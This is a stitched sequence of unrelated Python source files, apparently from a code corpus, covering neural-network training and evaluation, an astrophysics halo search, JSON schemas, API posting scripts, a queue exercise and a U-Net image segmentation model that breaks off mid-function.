os.path.exists(model_path):\r\n os.makedirs(model_path)\r\n\r\n\r\n# Define an input sequence and process it.\r\ninputs = Input(shape=(None, input_dim))\r\nlstm_outputs = inputs\r\nfor layer_no in range(num_layers-1):\r\n lstm_outputs = GRU(lstm_size, return_state=False, return_sequences=True)(lstm_outputs)\r\n#last layer, that does not return sequences\r\nlstm_outputs = GRU(lstm_size, return_state=False, return_sequences=False)(lstm_outputs)\r\ndense = Dense(num_classes, activation='softmax')\r\noutputs = dense(lstm_outputs)\r\nmodel = Model(inputs, outputs)\r\n\r\n\r\n#compile autoencoder\r\nif optimizer == 'RMS': optimizer = RMSprop(lr=learning_rate)\r\nif optimizer == 'Adam': optimizer = Adam(lr=learning_rate)\r\nloss = 'categorical_crossentropy'\r\nmodel.compile(optimizer=optimizer, loss=loss, metrics=['accuracy'])\r\n\r\nprint(model.summary())\r\n\r\n# initialize loss arrays\r\ntotal_test_loss_array = [] \r\ntotal_test_accuracy_array = []\r\ntotal_train_loss_array = []\r\ntotal_train_loss = 0\r\ntotal_train_accuracy_array = []\r\ntotal_train_accuracy = 0\r\n\r\n\r\nif scale_velocity_between_0_and_1:\r\n for V in (V_train + V_test):\r\n V[np.nonzero(V)] = (V[np.nonzero(V)] - velocity_threshold_such_that_it_is_a_played_note) / (1.0-velocity_threshold_such_that_it_is_a_played_note)\r\n\r\nif only_train_note_starts:\r\n for V in (V_train + V_test):\r\n V[np.nonzero(V)] = 1\r\n\r\n# Test function\r\ndef test(testID):\r\n print('\\nTesting:')\r\n total_test_loss = 0\r\n total_test_loss_length = 0\r\n total_test_loss_number = 0\r\n\r\n confusion_matrix = np.zeros((num_classes, num_classes))\r\n\r\n bar = progressbar.ProgressBar(max_value=test_set_size, redirect_stdout=False)\r\n for i, test_song in enumerate(X_test):\r\n\r\n X = V_test[i]\r\n X = np.expand_dims(X, 2)\r\n num_samples = X.shape[0]\r\n c = C_test[i]\r\n Y = np.asarray([to_categorical(c, num_classes=num_classes)]*num_samples).squeeze()\r\n\r\n scores = model.evaluate(X,Y , batch_size=batch_size, verbose=verbose)\r\n if reset_states:\r\n model.reset_states()\r\n total_test_loss += scores[0]\r\n\r\n Y_predicted = model.predict(X, batch_size=batch_size, verbose=verbose)\r\n for y_val, y_predicted in zip(Y, Y_predicted):\r\n y_class_test = np.argmax(y_val)\r\n y_class_predicted = np.argmax(y_predicted)\r\n confusion_matrix[y_class_predicted, y_class_test] += 1\r\n bar.update(i+1)\r\n\r\n accuracy = np.sum(np.diagonal(confusion_matrix)) / np.sum(confusion_matrix)\r\n total_test_loss_array.append(total_test_loss/test_set_size)\r\n total_test_accuracy_array.append(accuracy)\r\n print('\\nTotal test loss: ', total_test_loss/test_set_size)\r\n print('Total accuracy: ' + str(accuracy*100) + \"%\") \r\n print('-'*50)\r\n plt.figure()\r\n plt.title('Style classification on velocity information')\r\n plt.plot(total_test_loss_array, label='Total test loss')\r\n plt.plot(total_train_loss_array, label='Total train loss')\r\n plt.plot(total_test_accuracy_array, label='Total test accuracy')\r\n plt.plot(total_train_accuracy_array, label='Total train accuracy')\r\n plt.legend(loc='lower left', prop={'size': 8})\r\n if show_plot: plt.show()\r\n if save_plot: \r\n plt.savefig(model_path+t+'velocity_train.png')\r\n tikz_save(model_path+t+'velocity_train.tex', encoding='utf-8', show_info=False)\r\n pickle.dump(total_test_loss_array,open(model_path+'total_test_loss_array.pickle', 'wb'))\r\n pickle.dump(total_test_accuracy_array,open(model_path+'total_test_accuracy_array.pickle', 'wb'))\r\n 
pickle.dump(total_train_accuracy_array,open(model_path+'total_train_accuracy_array.pickle', 'wb'))\r\n pickle.dump(total_train_loss_array,open(model_path+'total_train_loss_array.pickle', 'wb'))\r\n\r\n if testID % save_step is 0:\r\n confusion_matrix = confusion_matrix/confusion_matrix.sum(axis=1, keepdims=True)\r\n plt.figure()\r\n plt.imshow(confusion_matrix, interpolation='nearest')\r\n plt.title('Total accuracy: ' + str(accuracy) + '%')\r\n plt.ylabel('True label')\r\n plt.xlabel('Predicted label')\r\n plt.xticks(np.arange(0,num_classes), classes)\r\n plt.yticks(np.arange(0,num_classes), classes)\r\n plt.colorbar()\r\n if show_plot: plt.show()\r\n if save_plot: \r\n plt.savefig(model_path+'confusion_matrix' + str(testID) + '.png')\r\n tikz_save(model_path+'confusion_matrix' + str(testID) + '.tex', encoding='utf-8', show_info=False)\r\n\r\n\r\n# Save Parameters to text file\r\nwith open(model_path + 'params.txt', \"w\", encoding='utf-8') as text_file:\r\n text_file.write(\"velocity_threshold_such_that_it_is_a_played_note: %s\" % velocity_threshold_such_that_it_is_a_played_note + '\\n')\r\n text_file.write(\"epochs: %s\" % epochs + '\\n')\r\n text_file.write(\"train_set_size: %s\" % train_set_size + '\\n')\r\n text_file.write(\"test_set_size: %s\" % test_set_size + '\\n')\r\n text_file.write(\"only_train_note_starts: %s\" % only_train_note_starts + '\\n')\r\n text_file.write(\"learning_rate: %s\" % learning_rate + '\\n')\r\n text_file.write(\"save_step: %s\" % save_step + '\\n')\r\n text_file.write(\"shuffle_train_set: %s\" % shuffle_train_set + '\\n')\r\n text_file.write(\"test_step: %s\" % test_step + '\\n')\r\n text_file.write(\"bidirectional: %s\" % bidirectional + '\\n')\r\n text_file.write(\"load_from_pickle_instead_of_midi: %s\" % load_from_pickle_instead_of_midi + '\\n')\r\n text_file.write(\"pickle_load_path: %s\" % pickle_load_path + '\\n')\r\n text_file.write(\"train_paths: %s\" % train_paths + '\\n')\r\n text_file.write(\"test_paths: %s\" % test_paths + '\\n')\r\n\r\n# Train model\r\nprint('training model...')\r\nfor e in range(1, epochs+1):\r\n\r\n total_train_loss = 0\r\n total_train_accuracy = 0\r\n \r\n print('Epoch ', e, 'of ', epochs, 'Epochs\\nTraining:')\r\n\r\n\r\n if shuffle_train_set:\r\n\r\n permutation = np.random.permutation(len(X_train))\r\n\r\n train_paths = [train_paths[i] for i in permutation]\r\n X_train = [X_train[i] for i in permutation]\r\n Y_train = [Y_train[i] for i in permutation]\r\n C_train = [C_train[i] for i in permutation]\r\n I_train = [I_train[i] for i in permutation]\r\n V_train = [V_train[i] for i in permutation]\r\n D_train = [D_train[i] for i in permutation]\r\n T_train = [T_train[i] for i in permutation]\r\n\r\n bar = progressbar.ProgressBar(max_value=train_set_size)\r\n \r\n # Train model with each song seperately\r\n for i, train_song in enumerate(X_train):\r\n\r\n X = V_train[i]\r\n X = np.expand_dims(X, 2)\r\n num_samples = X.shape[0]\r\n\r\n if num_samples > 1:\r\n c = C_train[i]\r\n Y = np.asarray([to_categorical(c, num_classes=num_classes)]*num_samples).squeeze()\r\n\r\n\r\n hist = model.fit(X, Y,\r\n epochs=1,\r\n batch_size=batch_size,\r\n shuffle=False,\r\n verbose=verbose)\r\n\r\n if reset_states:\r\n model.reset_states()\r\n\r\n total_train_loss += np.mean(hist.history['loss'])\r\n total_train_accuracy += np.mean(hist.history['acc'])\r\n bar.update(i+1)\r\n if (e+1)%test_step is 0:\r\n total_train_loss = total_train_loss/train_set_size\r\n total_train_loss_array.append(total_train_loss)\r\n total_train_accuracy = 
total_train_accuracy/train_set_size\r\n total_train_accuracy_array.append(total_train_accuracy)\r\n test(e)\r\n \r\n\r\n if e%save_step is 0:\r\n print('saving model')\r\n model_save_path = model_path + 'model' + 'Epoch' + str(e) + model_filetype\r\n model.save(model_save_path)\r\n\r\n\r\n","sub_path":"velocity_classifier.py","file_name":"velocity_classifier.py","file_ext":"py","file_size_in_byte":10986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"282817120","text":"import tensorflow as tf\nimport numpy as np\nimport cv2 as cv\nimport random\nimport math\nfrom sklearn.utils import shuffle\nimport pdb\nimport re\nimport data_reader as reader\nimport time\nimport os\n\n\nimport networks as nets\nimport utils\nimport params\n\ndef run_network(images, ground_truth, checkpoint_name):\n '''\n images, ground_truth are nd-arrays of size [batch_size(num_images=depth), heigth, width, num_channels]\n ''' \n \n tf.reset_default_graph() \n input = tf.placeholder(tf.float32, (1, images.shape[1], images.shape[2], params.num_channels), name='input') \n output_h_w, _ = params.network_architecture_H_W(input, params.kernel_size) \n \n input_depth = tf.placeholder(tf.float32, (1, ground_truth.shape[2], images.shape[0], params.num_channels), name='input_depth') \n output, _, _ = params.network_architecture_D(input_depth, params.kernel_size) \n \n predicted = tf.placeholder(tf.float32, (ground_truth.shape[0], ground_truth.shape[1], ground_truth.shape[2], params.num_channels), name='predicted')\n target = tf.placeholder(tf.float32, (ground_truth.shape[0], ground_truth.shape[1], ground_truth.shape[2], params.num_channels), name='target')\n # loss computed based on the original 3d image and the 3d image \n if(params.LOSS == params.L1_LOSS):\n loss = tf.reduce_mean(tf.abs(predicted - target)) \n if(params.LOSS == params.L2_LOSS):\n loss = tf.reduce_mean(tf.square(predicted - target))\n \n # restore values\n saver = tf.train.Saver()\n \n config = tf.ConfigProto(\n device_count = {'GPU': 1}\n ) \n with tf.Session(config=config) as sess: \n saver.restore(sess, checkpoint_name)\n # resize on height and witdh\n output_h_w_ = np.zeros((images.shape[0], ground_truth.shape[1], ground_truth.shape[2], ground_truth.shape[3]))\n for i in range(images.shape[0]):\n output_h_w_[i] = sess.run(output_h_w, feed_dict={input: [images[i]]})[0] \n # resize on depth \n output_h_w_ = np.transpose(output_h_w_, [1, 2, 0, 3]) \n output_h_w_d = np.zeros((ground_truth.shape[1], ground_truth.shape[2], ground_truth.shape[0], params.num_channels)) \n for i in range(output_h_w_.shape[0]): \n output_h_w_d[i] = sess.run(output, feed_dict={input_depth: [output_h_w_[i]]})[0] \n \n output_3d_resized = np.transpose(output_h_w_d, [2, 0, 1, 3]) \n cost = sess.run(loss, feed_dict={predicted: output_3d_resized , target: ground_truth}) \n ssim_batch, psnr_batch = utils.compute_ssim_psnr_batch(output_3d_resized, ground_truth) \n \n return cost, ssim_batch, psnr_batch\n \n \n \ndef eval(data_reader, checkpoint_name=tf.train.latest_checkpoint(params.folder_data)): \n \n num_images = 0\n cost = 0\n ssim = 0\n psnr = 0 \n epoch = int(re.findall(r'\\d+', checkpoint_name)[0])\n \n # for every nd-array in the list\n for i in range(data_reader.num_eval_images): \n images = data_reader.eval_images[i]\n ground_truth = data_reader.eval_images_gt[i]\n num_images += ground_truth.shape[0]\n loss, ssim_batch, psnr_batch = run_network(images, ground_truth, checkpoint_name)\n cost += loss * ground_truth.shape[0]\n ssim += ssim_batch\n psnr += psnr_batch \n print(ssim, psnr, num_images) \n\n tf.summary.scalar('loss', cost/num_images) \n tf.summary.scalar('ssim', ssim/num_images) \n tf.summary.scalar('psnr', psnr/num_images) \n merged = tf.summary.merge_all()\n config = tf.ConfigProto(\n device_count = {'GPU': 0}\n ) \n with tf.Session(config=config) as sess:\n writer = tf.summary.FileWriter('eval.log')\n merged_ = sess.run(merged)\n writer.add_summary(merged_, epoch) \n \n print('eval---epoch: {} loss: {} 
ssim: {} psnr: {} '.format(epoch, cost/num_images, ssim/num_images, psnr/num_images))\n \n \ndef test(data_reader, checkpoint_name=tf.train.latest_checkpoint(params.folder_data)): \n \n num_images = 0\n cost = 0\n ssim = 0\n psnr = 0 \n epoch = int(re.findall(r'\\d+', checkpoint_name)[0])\n \n # for every nd-array in the list\n for i in range(data_reader.num_test_images): \n images = data_reader.test_images[i]\n ground_truth = data_reader.test_images_gt[i] \n num_images += ground_truth.shape[0]\n loss, ssim_batch, psnr_batch = run_network(images, ground_truth, checkpoint_name)\n cost += loss * ground_truth.shape[0]\n ssim += ssim_batch\n psnr += psnr_batch\n print(ssim_batch, psnr_batch, num_images) \n tf.summary.scalar('loss', cost/num_images) \n tf.summary.scalar('ssim', ssim/num_images) \n tf.summary.scalar('psnr', psnr/num_images) \n merged = tf.summary.merge_all()\n config = tf.ConfigProto(\n device_count = {'GPU': 0}\n ) \n with tf.Session(config=config) as sess:\n writer = tf.summary.FileWriter('test.log')\n merged_ = sess.run(merged)\n writer.add_summary(merged_, epoch) \n \n print('test---epoch: {} loss: {} ssim: {} psnr: {} '.format(epoch, cost/num_images, ssim/num_images, psnr/num_images))\n \n\n\ndef run_eval_test(data_reader):\n while(True):\n latest_checkpoint = tf.train.latest_checkpoint(params.folder_data)\n if(latest_checkpoint == None):\n print('sleeping for 60 sec')\n time.sleep(60)\n continue\n # check if it was already tested\n if(os.path.isfile(params.latest_ckpt_filename)):\n latest_checkpoint_tested = np.loadtxt(params.latest_ckpt_filename, dtype=\"str\")\n if(latest_checkpoint_tested == latest_checkpoint):\n print('sleeping for 60 sec')\n time.sleep(60)\n else:\n eval(data_reader, latest_checkpoint)\n test(data_reader, latest_checkpoint)\n np.savetxt(params.latest_ckpt_filename, [latest_checkpoint], delimiter=\" \", fmt=\"%s\")\n else:\n # eval(data_reader, latest_checkpoint)\n test(data_reader, latest_checkpoint)\n np.savetxt(params.latest_ckpt_filename, [latest_checkpoint], delimiter=\" \", fmt=\"%s\") \n \n \n\n \ndata_reader = reader.DataReader('./data/train', './data/train', './data/train', is_training=False)\n#(data_reader, checkpoint_name='./data_ckpt/model.ckpt49')\nrun_eval_test(data_reader) ","sub_path":"cnn/HWD-resize/eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":6440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"134710559","text":"from __future__ import absolute_import\nimport numpy as np\n\nfrom .. import BuiltinFunction, FixedInput, FixedNumericInput, StoredProperty, MultiCalculation, ReturnInputHalos\nfrom ... import core\nfrom ... import relation_finding\nfrom ... import temporary_halolist as thl\n\n@BuiltinFunction.register\ndef find_progenitor(source_halos, property_name, property_criterion):\n if property_criterion!='min' and property_criterion!='max':\n raise ValueError(\"Property criterion must be either 'min' or 'max'\")\n\n if len(source_halos)==0:\n return []\n\n all_major_progs = relation_finding.multi_source.MultiSourceAllMajorProgenitorsStrategy(source_halos)\n\n sources = all_major_progs.sources()\n\n property_and_obj = MultiCalculation(ReturnInputHalos(), property_name.name)\n\n with all_major_progs.temp_table() as tt :\n raw_query = thl.halo_query(tt)\n query = property_and_obj.supplement_halo_query(raw_query)\n all_major_progs = query.all()\n db_objects, values = property_and_obj.values_sanitized(all_major_progs, core.Session.object_session(source_halos[0]))\n\n # now re-organize the values so that we have one per source\n values_per_source = {s:[] for s in range(len(source_halos))}\n objs_per_source = {s:[] for s in range(len(source_halos))}\n for source, value, obj in zip(sources, values, db_objects):\n values_per_source[source].append(value)\n objs_per_source[source].append(obj)\n\n results = []\n for s in range(len(source_halos)):\n vals = values_per_source[s]\n objs = objs_per_source[s]\n assert len(vals)==len(objs)\n if len(vals)==0:\n results.append(None)\n else:\n if property_criterion=='min':\n index = np.argmin(vals)\n elif property_criterion=='max':\n index = np.argmax(vals)\n else:\n assert False # should not reach this point\n results.append(objs[index])\n return results\n\n\n\nfind_progenitor.set_input_options(0, provide_proxy=True, assert_class = StoredProperty)\nfind_progenitor.set_input_options(1, provide_proxy=True, assert_class = FixedInput)","sub_path":"tangos/live_calculation/builtin_functions/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":2159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"201290961","text":"crate_table_schema = {\n 'type': 'object',\n 'properties': {\n 'column_types': {\n 'type': 'object',\n 'minLength': 1,\n 'additionalProperties': {\n 'type': 'string',\n 'minLength': 1\n },\n 'maxProperties': 1024\n },\n 'read_only_groups': {\n 'type': 'array',\n 'items': {\n 'type': 'string',\n 'minLength': 0,\n }\n }\n },\n 'requiredProperties': ['column_types'],\n 'additionalProperties': False,\n}\n\nmerge_table_data_schema = {\n 'type': 'object',\n 'properties': {\n 'merge_column_names': {\n 'type': 'array',\n 'items': {\n 'type': 'string',\n 'minLength': 1,\n }\n }\n },\n 'requiredProperties': ['merge_column_names'],\n 'additionalProperties': False,\n}","sub_path":"almacen_api/companies/feeds_validation.py","file_name":"feeds_validation.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"436707343","text":"import requests\nimport datetime\nimport json\n\n\nURL=\"http://covid-openknowledge.herokuapp.com/covidOpenKnowledge/api/v1/noticias\"\n\ndef post_noticias(data):\n print()\n payload={\n # \"estadoCuarentena\": \"true\",\n # \"fecha\": str(datetime.datetime.utcnow()),\n \"fuente\": str(data['fuente']),\n \"resumen\": str(data['resumen']),\n \"titulo\": str(data['titulo'])\n }\n data = json.dumps(payload)\n r = requests.post(URL, data = data,headers={'Content-Type': 'application/json',\"charset\":\"UTF-8\"},)\n # print(r.json())\n # return r\n return r.text","sub_path":"bots/api_covid.py","file_name":"api_covid.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"223751046","text":"\n# coding: utf-8\n\n\n\n\nfrom requests import post\nfrom json import dumps\nfrom pandas.io.json import json_normalize\n\napi_token = 'DN3Q4dh3a3X6KBf7QTv73QDnuDYymZyOqcUtt4Ch'\nauth_url = 'https://app.leanix.net/services/mtm/v1/oauth2/token' # or something else if you have a dedicated MTM instance - you will know it if that is the case and if you don't just use this one.\nrequest_url_pf = 'https://demo-eu.leanix.net/services/pathfinder/v1/graphql' # same thing as with the auth_url\nrequest_url_metrics = 'https://demo-eu.leanix.net/services/metrics/v1/points'\n\nresponse = post(auth_url,\n auth=('apitoken', api_token),\n data={'grant_type': 'client_credentials'})\nresponse.raise_for_status() # this merely throws an error, if Webserver does not respond with a '200 OK'\naccess_token = response.json()['access_token']\n\n\n\n\ngql_request_query = '''\nquery allFactSheetsQuery($filter: FilterInput!, $sortings: [Sorting]) {\n allFactSheets(first: 40, filter: $filter, sort: $sortings) {\n totalCount\n pageInfo {\n hasNextPage\n hasPreviousPage\n startCursor\n endCursor\n }\n edges {\n node {\n ... on Hospital {\n id\n displayName\n bedsTotal\n bedsTotalUsed\n bedsICU\n bedsICUUsed\n relHospitalToPlace {\n edges{\n node{\n id\n factSheet {\n id\n name \n }\n }\n }\n }\n }\n }\n }\n }\n}\n''' \ngql_request_variables = {\"filter\":{\"facetFilters\":[{\"facetKey\":\"FactSheetTypes\",\"operator\":\"OR\",\"keys\":[\"Hospital\"]},{\"facetKey\":\"relHospitalToPlace\",\"operator\":\"NOR\",\"keys\":[\"__missing__\"]}]},\"sortings\":[{\"key\":\"displayName\",\"order\":\"asc\"}]}\n\n\n\ndata = {\"query\" : gql_request_query, \"variables\": gql_request_variables}\njson_data = dumps(data)\nauth_header = 'Bearer ' + access_token\nheader = {'Authorization': auth_header}\n \nresponse = post(url=request_url_pf, headers=header, data=json_data)\nresponse.raise_for_status()\n## Next: take the output and form a meaningful python object:\nhospital_data = json_normalize(response.json()['data']['allFactSheets']['edges'])\n\n\n\n## extract plac_id\nhospital_data['place_id'] = hospital_data.apply(lambda row: row['node.relHospitalToPlace.edges'][0]['node']['factSheet']['id'], axis=1)\n\n##group by the places\nplaces_sum_df = hospital_data.groupby(['place_id']).sum()\n\n\nplaces_sum_df.columns = ['bedsTotal','bedsTotalUsed','bedsICU','bedsICUUsed']\n\n\nfor key, value in places_sum_df.iterrows():\n data = {\n 'measurement': 'Availability of Beds',\n 'workspaceId': '0c4b27c9-dd38-4d42-a7f4-d3a7b5ea0551',\n 'tags': [\n {\n 'k': 'factSheetId',\n 'v': key\n }\n ],\n 'fields':\n [\n {\n 'k': 'bedsTotal',\n 'v': value['bedsTotal']\n },\n {\n 'k': 'bedsTotalUsed',\n 'v': value['bedsTotalUsed']\n },\n {\n 'k': 'bedsICU',\n 'v': value['bedsICU']\n },\n {\n 'k': 'bedsICUUsed',\n 'v': value['bedsICUUsed']\n }\n ]\n }\n json_data = dumps(data)\n header_metrics = {'Authorization': auth_header, 'Content-Type': 'application/json'}\n response = post(url=request_url_metrics, headers=header_metrics, data = json_data)\n response.raise_for_status()\n print(response.json())\n\n\n# In[38]:\n\n\n## Generate dummy legacy data:\n## comment in the two last lines to generate the dummy data again.\nfrom datetime import timedelta, date\nfrom math import floor\nfor key, value in places_sum_df.iterrows():\n for single_date in (date.today() - timedelta(n) for n in range(7)):\n \n data = {\n 'measurement': 'Availability of Beds',\n 'workspaceId': '0c4b27c9-dd38-4d42-a7f4-d3a7b5ea0551',\n 'tags': [\n {\n 'k': 'factSheetId',\n 
'v': key\n }\n ],\n 'time': single_date.isoformat() + 'T08:00:00.000Z',\n 'fields':\n [\n {\n 'k': 'bedsTotal',\n 'v': value['bedsTotal']\n },\n {\n 'k': 'bedsTotalUsed',\n 'v': floor(value['bedsTotalUsed'] * 0.95**((date.today()-single_date).days))\n },\n {\n 'k': 'bedsICU',\n 'v': value['bedsICU']\n },\n {\n 'k': 'bedsICUUsed',\n 'v': floor(value['bedsICUUsed'] * 0.95**((date.today()-single_date).days))\n }\n ]\n }\n json_data = dumps(data)\n header_metrics = {'Authorization': auth_header, 'Content-Type': 'application/json'}\n# response = post(url=request_url_metrics, headers=header_metrics, data = json_data)\n# response.raise_for_status()\n\n","sub_path":"generate-metrics/Availability of Beds Metrics.py","file_name":"Availability of Beds Metrics.py","file_ext":"py","file_size_in_byte":5085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"486993977","text":"def solution(A, B):\n if not isinstance(A, str) or not isinstance(B, str) or not A or not B or len(A) > len(B):\n print(\"Invalid input\")\n return -1\n\n hashTableA = [0] * 26\n for s in A:\n hashTableA[ord(s) - ord('a')] += 1\n\n hashTableB = [0] * 26\n for i in range(len(A)):\n hashTableB[ord(A[i]) - ord('a')] += 1\n\n if hashTableA == hashTableB:\n return True\n\n for i in range(len(A), len(B)):\n hashTableB[ord(B[i - len(A)]) - ord('a')] -= 1\n hashTableB[ord(B[i]) - ord('a')] += 1\n\n if hashTableB == hashTableA:\n return True\n\n return False\n\n\nA = 'acb'\nB = 'dabce'\n\nprint(solution(A, B))\n","sub_path":"others/OnlineTest_Recruitment/ms_AFullPermutationInB.py","file_name":"ms_AFullPermutationInB.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"560148497","text":"from random import randint\r\nimport time\r\n\r\n\r\nclass Cliente:\r\n def __init__(self):\r\n self.nomes = []\r\n self.horas = []\r\n \r\n def IsEMPTY(self):\r\n return len(self.nomes) == 0\r\n\r\n def ENQUEUE(self, nome, hora):\r\n self.nomes.append(nome)\r\n self.horas.append(hora)\r\n\r\n def DEQUEUE(self):\r\n if (not(self.IsEMPTY())):\r\n return self.nomes.pop(0)\r\n return self.horas.pop(0)\r\n\r\n def LENGTH(self):\r\n return len(self.nomes)\r\n\r\ndef main(): \r\n FilaClientes = Cliente()\r\n\r\n for i in range(1,5):\r\n FilaClientes.nomes.append(\"Cliente %d\"%(i))\r\n FilaClientes.horas.append(\"07:%d5 AM\"%(i))\r\n\r\n print(\"------- Clientes na fila -------\")\r\n print(FilaClientes.nomes, \"\\n\")\r\n\r\n print(\"------- Hora de chegada na fila -------\")\r\n print(FilaClientes.horas, \"\\n\")\r\n\r\n\r\n somaTempo = 0\r\n\r\n for i in range(1,5):\r\n print(\"Atendimento do Cliente %d sendo realizado...\"%(i))\r\n print(\"Atendimento realizado com sucesso!\\n\")\r\n intervaloTempo = randint(2, 10)\r\n\r\n tempoInicial = time.time()\r\n time.sleep(intervaloTempo)\r\n FilaClientes.DEQUEUE()\r\n tempoFinal = time.time()\r\n\r\n tempoTotal = tempoFinal-tempoInicial\r\n\r\n somaTempo+=tempoTotal\r\n\r\n mediaTempo = somaTempo/len(FilaClientes.horas)\r\n print(\"A media total de atendimento é de %d minutos.\"%(mediaTempo))\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n\r\n\r\n\r\n \r\n","sub_path":"AtividadeFila2/Atividade Fila 02/Questão 03.py","file_name":"Questão 03.py","file_ext":"py","file_size_in_byte":1480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"532508274","text":"import os\nimport torch\nimport torch.nn as nn\nfrom torch import optim\nfrom torchsummary import summary\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nfrom torch.utils.data import Dataset, DataLoader\nfrom sklearn.metrics import confusion_matrix\nimport numpy as np\nimport PIL\nfrom PIL import Image\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n#print(device)\n\ntraining_image_dir = 'data/KITTI_SEMANTIC/Training_00/RGB/'\ntraining_target_dir = 'data/KITTI_SEMANTIC/Training_00/GT/'\ntest_image_dir = 'data/KITTI_SEMANTIC/Validation_07/RGB/'\ntest_target_dir = 'data/KITTI_SEMANTIC/Validation_07/GT/'\noutput_dir = 'data/KITTI_SEMANTIC/Result/'\nn_classes = 12\nimgage_width = 800\nimage_height = 320\n\ncolor_to_int = {(64, 0, 128): 0,\n (128, 128, 128): 1,\n (128, 128, 0): 2,\n (64, 64, 128): 3,\n (128, 0, 0): 4,\n (0, 0, 0): 5,\n (0, 0, 192): 6,\n (128, 64, 128): 7,\n (192, 128, 128): 8,\n (192, 192, 128): 9,\n (0, 128, 192): 10,\n (64, 64, 0): 11}\n\nint_to_color = {0: (64, 0, 128),\n 1: (128, 128, 128),\n 2: (128, 128, 0),\n 3: (64, 64, 128),\n 4: (128, 0, 0),\n 5: (0, 0, 0),\n 6: (0, 0, 192),\n 7: (128, 64, 128),\n 8: (192, 128, 128),\n 9: (192, 192, 128),\n 10: (0, 128, 192),\n 11: (64, 64, 0)}\n\n\ndef to_categorical(y, num_classes):\n \"\"\" 1-hot encodes a tensor \"\"\"\n return np.eye(num_classes, dtype='uint8')[y]\n\nclass KITTITrainingDataset(Dataset):\n\n def __init__(self, image_dir, target_dir, transform=None):\n self.image_dir = image_dir\n self.target_dir = target_dir\n self.transform = transform\n self.file_names = os.listdir(self.image_dir)\n self.color_idx = 0\n self.n_images = len(self.file_names)\n self.crop_box = (0, 0, imgage_width, image_height)\n\n def __len__(self):\n return len(self.file_names)\n\n def __getitem__(self, idx):\n training_image = np.array(Image.open(os.path.join(self.image_dir, self.file_names[idx])).crop(self.crop_box))\n target_image = np.array(Image.open(os.path.join(self.target_dir, self.file_names[idx])).crop(self.crop_box))\n img_height, img_width, channel = target_image.shape\n unique_colors = set(tuple(v) for m2d in target_image for v in m2d)\n for color in unique_colors:\n if color not in color_to_int.keys():\n color_to_int[color] = self.color_idx\n int_to_color[self.color_idx] = color\n self.color_idx += 1\n\n target_image = [[color_to_int[tuple(color)] for color in row] for row in target_image]\n if self.transform:\n training_image = self.transform(training_image)\n target_image = np.asarray([to_categorical(row, n_classes) for row in target_image])\n sample = {'image': training_image.reshape(3, img_height, img_width), \\\n 'target': target_image.reshape(n_classes, img_height, img_width)}\n return sample\n\n\nclass ConvBlock(nn.Module):\n def __init__(self, in_channels, out_channels):\n super(ConvBlock, self).__init__()\n self.batch_norm = nn.BatchNorm2d(out_channels)\n self.conv1 = nn.Conv2d(in_channels, out_channels, kernel_size=3, padding=1) #padding=1\n self.conv2 = nn.Conv2d(out_channels, out_channels, kernel_size=3, padding=1) #padding=1\n\n def forward(self, x):\n x = F.relu(self.conv1(x))\n x = self.batch_norm(x)\n x = F.relu(self.conv2(x))\n x = self.batch_norm(x)\n return x\n\n\nclass Unet(nn.Module):\n def __init__(self, n_classes):\n super(Unet, self).__init__()\n self.n_classes = n_classes\n\n self.pool1 = nn.MaxPool2d(kernel_size=2)\n self.pool2 = nn.MaxPool2d(kernel_size=2)\n self.pool3 = 
nn.MaxPool2d(kernel_size=2)\n self.pool4 = nn.MaxPool2d(kernel_size=2)\n\n self.up1 = nn.Upsample(scale_factor=2, mode='nearest')\n self.up2 = nn.Upsample(scale_factor=2, mode='nearest')\n self.up3 = nn.Upsample(scale_factor=2, mode='nearest')\n self.up4 = nn.Upsample(scale_factor=2, mode='nearest')\n\n self.conv1 = ConvBlock(3, 32)\n self.conv2 = ConvBlock(32, 64)\n self.conv3 = ConvBlock(64, 128)\n self.conv4 = ConvBlock(128, 256)\n self.conv5 = ConvBlock(256, 512)\n\n self.conv6 = ConvBlock(768, 256)\n self.conv7 = ConvBlock(384, 128)\n self.conv8 = ConvBlock(192, 64)\n self.conv9 = ConvBlock(96, 32)\n\n self.conv10 = nn.Conv2d(32, n_classes, 1, 1)\n\n def forward(self, x):\n c1 = self.conv1(x)\n x = self.pool1(c1)\n c2 = self.conv2(x)\n x = self.pool2(c2)\n c3 = self.conv3(x)\n x = self.pool3(c3)\n c4 = self.conv4(x)\n x = self.pool4(c4)\n x = self.conv5(x)\n x = self.up1(x)\n x = torch.cat([x, c4], 1)\n x = self.conv6(x)\n x = self.up2(x)\n x = torch.cat([x, c3], 1)\n x = self.conv7(x)\n x = self.up3(x)\n x = torch.cat([x, c2], 1)\n x = self.conv8(x)\n x = self.up4(x)\n x = torch.cat([x, c1], 1)\n x = self.conv9(x)\n x = self.conv10(x)\n return x\n\n\ndef train(model, dataset, criterion, optimizer, batch_size=1, shuffle=False):\n optimizer.zero_grad()\n\n dataloader = DataLoader(dataset, batch_size=batch_size, shuffle=shuffle, num_workers=1)\n total_loss = []\n for i_batch, sample_batched in enumerate(dataloader):\n image, target = Variable(sample_batched['image'].cuda()), Variable(sample_batched['target'].cuda())\n image = image.type(torch.cuda.FloatTensor)\n topv_target, topi_target = target.type(torch.cuda.LongTensor).view(-1, n_classes).topk(1)\n target = topi_target.squeeze().detach()\n\n output = model(image).view(-1, n_classes)\n output = F.log_softmax(output, dim=-1) # or dim=1 also can\n\n loss = criterion(output, target)\n 